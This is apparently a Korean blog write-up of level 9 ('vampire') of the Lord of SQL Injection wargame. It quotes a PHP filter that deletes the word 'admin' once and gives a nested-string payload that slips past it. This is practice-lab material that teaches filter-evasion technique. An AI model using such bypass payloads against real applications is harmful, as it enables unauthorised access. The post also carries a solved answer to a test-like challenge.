-
LOS - vampire / level 9Web/SQLI 2024. 6. 23. 19:28
문제
풀이 과정
$_GET[id] = strtolower($_GET[id]);
$_GET[id] = str_replace("admin","",$_GET[id]);admin이라는 단어를 "" 로 필터링 하고 있다
즉, admin사이에 admin을 넣으면 우회 할 수 있다.
정답
더보기?id=adadminmin
'Web > SQLI' 카테고리의 다른 글
LOS - golem / level 11 (0) 2024.06.24 LOS - skeleton / level 10 (0) 2024.06.23 LOS - troll / level 8 (0) 2024.06.23 LOS - orge / level 7 (0) 2024.06.23 LOS - darkelf / level 6 (0) 2024.06.23